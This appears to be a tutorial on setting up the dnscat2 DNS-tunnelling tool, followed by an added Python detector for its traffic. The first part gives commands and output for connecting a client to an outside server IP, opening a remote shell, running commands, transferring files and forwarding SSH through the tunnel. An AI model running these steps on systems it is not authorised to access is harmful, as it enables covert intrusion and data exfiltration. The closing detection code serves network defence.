1. Installation

Server installation

Install the server as follows. Mind the dependencies: the latest dnscat2 needs ruby >= 2.3.0 (check with ruby -v before running bundle install).

$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle install

Linux client installation

Install with the following commands:

$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make

Windows client installation
Compile it yourself (only VS 2008 works)

The author's own words: Hmm, I have never tried to compile on that platform - just VS 2008.

Or download a release from: https://downloads.skullsecurity.org/dnscat2/

Running the server:

ruby dnscat2.rb --dns host=0.0.0.0,port=53531
ruby dnscat2.rb --dns host=23.105.193.106,port=53531,type=TXT --secret=qwer1234 (--secret is the pre-shared secret; the server listens with host=, the client connects with server=)
ruby dnscat2.rb xxx.com

Running the client:

./dnscat --dns server=23.105.193.106,port=53531
./dnscat --dns server=23.105.193.106,port=53531 --secret=qwer1234 (the pre-shared secret, must match the server's)
./dnscat xxx.com

[scode type="red"]Note: the server and client commands above correspond line by line; the port and the secret must match on both sides (the port itself can be anything you like), and if you connect by domain name, the domain must be delegated to your server with an NS record so that its queries actually reach dnscat2.[/scode]

Server run (with output):

[root@gelen server]# ruby dnscat2.rb --dns host=0.0.0.0,port=53531 --secret=qwer1234

New window created: 0
New window created: crypto-debug
dnscat2> Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted and authenticated
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53531
[domains = n/a]...

It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53531 --secret=qwer1234

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53531.

Client run (with output):

~/tools/dnscat2/client ‹master› $ ./dnscat --dns server=23.105.193.106,port=53531 --secret=qwer1234
Creating DNS driver:
 domain = (null)
 host   = 0.0.0.0
 port   = 53531
 type   = TXT,CNAME,MX
 server = 23.105.193.106

** Peer verified with pre-shared secret!
 Session established!

[scode type="blue"]Session established! (this message means the connection succeeded)[/scode]

After the connection succeeds, the server side shows (the Ruby deprecation warnings are harmless):

New window created: 1
/root/tools/dnscat2/server/controller/packet.rb:228: warning: constant ::Bignum is deprecated
/root/tools/dnscat2/server/controller/packet.rb:228: warning: constant ::Bignum is deprecated
/root/tools/dnscat2/server/controller/crypto_helper.rb:13: warning: constant ::Bignum is deprecated
/root/tools/dnscat2/server/controller/crypto_helper.rb:21: warning: constant ::Bignum is deprecated
/root/tools/dnscat2/server/libs/dnser.rb:379: warning: constant ::Fixnum is deprecated
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

Use sessions to list the established sessions:

dnscat2> sessions
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53531 domains =  [*]
  1 :: command (DESKTOP-J0NS3F6) [encrypted and verified] [*]
dnscat2> 

Use session -i 1 to attach to this client:

dnscat2> session -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command (DESKTOP-J0NS3F6) 1> 

help shows the available commands:

command (DESKTOP-J0NS3F6) 1> help

Here is a list of commands (use -h on any of them for additional help):
* clear
* delay
* download
* echo
* exec
* help
* listen
* ping
* quit
* set
* shell
* shutdown
* suspend
* tunnels
* unset
* upload
* window
* windows
command (DESKTOP-J0NS3F6) 1> 

Typing shell spawns a shell (sh, or cmd on Windows) on the client as a new session:

command (DESKTOP-J0NS3F6) 1> windows

Windows active in this session (to see all windows, go to
the main window by pressing ctrl-z):

1 :: command (DESKTOP-J0NS3F6) [encrypted and verified] [active]
command (DESKTOP-J0NS3F6) 1> shell
Sent request to execute a shell
command (DESKTOP-J0NS3F6) 1> New window created: 2
Shell session created!

Press ctrl+z to go back to the main window; sessions now shows an extra session whose name starts with "sh". Attach to it with session -i 2:

dnscat2> sessions
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53531 domains =  [*]
  1 :: command (DESKTOP-J0NS3F6) [encrypted and verified]
  2 :: sh (DESKTOP-J0NS3F6) [encrypted and verified] [*]
dnscat2> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

sh (DESKTOP-J0NS3F6) 2> 

Now you can run commands on the client:

sh (DESKTOP-J0NS3F6) 2> uname -a
sh (DESKTOP-J0NS3F6) 2> Linux DESKTOP-J0NS3F6 4.4.0-17763-Microsoft #379-Microsoft Wed Mar 06 19:16:00 PST 2019 x86_64 x86_64 x86_64 GNU/Linux

sh (DESKTOP-J0NS3F6) 2> pwd
sh (DESKTOP-J0NS3F6) 2> /home/gelen/tools/dnscat2/client

Some other commands (at the main dnscat2> prompt):

quit (exit the console)
kill <id> (terminate a session)
set (set a value, e.g. set security=open)
windows (list all windows)
window -i <id> (attach to a window)

After attaching to a session, help likewise lists the commands available inside it (appending -h to any command explains that command):

clear (clear the screen)
delay (change the delay between the client's polling requests for this session)
exec (run a program on the remote machine)
shell (get a reverse shell)
download/upload (transfer files between the two ends)
suspend (go back up one level, the same as ctrl+z)

To forward a port through the DNS tunnel, first run the following inside the command session. It makes the dnscat2 server listen on 127.0.0.1:888 and forward every connection to that port through the tunnel to 10.0.0.10:22, as reached from the client's network:

listen 127.0.0.1:888 10.0.0.10:22

Then, on the server host, you can SSH through port 888:

ssh cell@127.0.0.1 -p 888

The rest is up to you, good luck!!
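The server banner above warns that direct queries are less stealthy, and the client output shows the record types it cycles through (TXT, CNAME, MX). As an added example for this post, not code from dnscat2 or from the original author, here is a small Python detector that scores a DNS query log for dnscat2-style names: dnscat2 hex-encodes each packet into the query name, so long purely hexadecimal labels, tunnel-friendly record types, very long names and high-entropy payloads are the signals. The log format (<epoch> <client> <qtype> <qname>), the client addresses, the names and the scoring thresholds are all constructed for the example.

```python
"""
Heuristic detector for dnscat2-style DNS tunnelling over a DNS query log.

Added example for this post; it is not part of the dnscat2 project. The
log format, client addresses and names below are constructed, not captured.
"""
import math
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# dnscat2 hex-encodes each packet and splits it into DNS labels (max 63 chars)
HEX_LABEL = re.compile(r"[0-9a-f]+")
# record types the client above cycles through (see "type = TXT,CNAME,MX")
TUNNEL_TYPES = {"TXT", "CNAME", "MX"}

# Constructed sample log, one query per line: "<epoch> <client_ip> <qtype> <qname>"
SAMPLE_LOG = """\
1552100001 10.0.0.5 A www.example.com
1552100002 10.0.0.5 AAAA www.example.com
1552100003 10.0.0.9 TXT 7b4e0100bb1a2f3d9c8e7f6a5b4c3d2e1f0a9b8c7d6e5f4a.3b2c1d0e9f8a7b6c5d4e3f2a1b0c9d8e7f6a5b4c3d2e1f0a.xxx.com
1552100004 10.0.0.9 CNAME 1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b.xxx.com
1552100005 10.0.0.9 MX 9f8e7d6c5b4a39281706f5e4d3c2b1a09f8e7d6c5b4a3928.xxx.com
1552100006 10.0.0.5 A mail.example.com
1552100007 10.0.0.7 TXT _dmarc.example.com
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; hex data tops out at 4.0, ordinary hostnames are far lower."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def score_query(qtype: str, qname: str) -> Tuple[int, List[str]]:
    """Score one query; each reason names a heuristic that fired (thresholds are assumptions)."""
    score, reasons = 0, []
    labels = [l.lower() for l in qname.rstrip(".").split(".") if l]
    # long, purely hexadecimal labels are the dnscat2 encoding signature
    hex_labels = [l for l in labels if len(l) >= 32 and HEX_LABEL.fullmatch(l)]
    if hex_labels:
        score += 2
        reasons.append("%d long hex label(s)" % len(hex_labels))
    if qtype.upper() in TUNNEL_TYPES:
        score += 1
        reasons.append("tunnel-friendly record type %s" % qtype)
    if len(qname) > 100:
        score += 1
        reasons.append("unusually long name (%d chars)" % len(qname))
    ent = shannon_entropy("".join(hex_labels))
    if ent >= 3.0:
        score += 1
        reasons.append("payload entropy %.2f bits/char" % ent)
    return score, reasons


def analyze(log_text: str, query_threshold: int = 3,
            client_threshold: int = 2) -> Dict[str, List[Tuple[str, int, List[str]]]]:
    """Return the clients that issued at least client_threshold suspicious queries."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qtype, qname = line.split(maxsplit=3)
        score, reasons = score_query(qtype, qname)
        if score >= query_threshold:
            per_client[client].append((qname, score, reasons))
    return {c: hits for c, hits in per_client.items() if len(hits) >= client_threshold}


if __name__ == "__main__":
    for client, hits in analyze(SAMPLE_LOG).items():
        print("suspect %s: %d tunnel-like queries" % (client, len(hits)))
        for qname, score, reasons in hits:
            print("  score=%d %s...  [%s]" % (score, qname[:40], "; ".join(reasons)))
```

Two caveats. Single TXT or CNAME lookups are normal (DMARC, DKIM, CDN hashes), which is why a client is only reported after several high-scoring queries rather than on one. And the direct-query mode the banner describes (no domain, UDP port 53531 straight to the server) never passes through the organisation's resolver, so a resolver log will not contain it at all; the complement there is egress flow telemetry or a firewall rule that blocks outbound UDP to ports other than 53 except from the resolvers themselves.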